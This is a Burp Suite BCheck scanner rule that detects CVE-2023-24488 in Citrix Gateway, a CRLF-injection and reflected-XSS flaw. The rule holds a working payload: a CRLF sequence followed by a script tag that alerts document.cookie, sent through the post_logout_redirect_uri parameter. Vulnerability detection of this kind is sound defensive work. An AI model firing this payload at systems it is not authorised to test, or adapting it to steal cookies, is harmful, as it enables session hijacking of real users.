CVE-2023-24488 - Citrix Gateway Open Redirect and XSS.bcheck

metadata:
    language: v1-beta
    name: "[CVE-2023-24488] Vulnerable Citrix Gateway Detected."
    description: "This rule checks if the remote host is vulnerable to CVE-2023-24488 - Citrix CRLF Injection / Reflected Xss"
    author: "TheButcher"
    tags: "CVE-2023-24488","citrix","crlf","xss","openredirection"

define:
    potential_path =
        "/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a%3Cscript%3Ealert(document.cookie)%3C/script%3E"

given host then
    send request called check:
        method: "GET"
        path: {potential_path}

    if "<script>alert(document.cookie)</script>" in {check.response.body} then
        report issue:
            severity: medium
            confidence: certain
            detail: "The post_logout_redirect_uri GET Parameter is susceptible to Open Redirection, which can be exploited for CRLF injection leading to XSS through HTTP Response Splitting. There is also a potential risk of cache poisoning if Citrix Gateway is deployed in such a configuration."
            remediation: "Affected customers of Citrix ADC and Citrix Gateway are recommended to install the relevant updated versions of Citrix ADC or Citrix Gateway as soon as possible - https://support.citrix.com/article/CTX477714/citrix-adc-and-citrix-gateway-security-bulletin-for-cve202324487-cve202324488"

    end if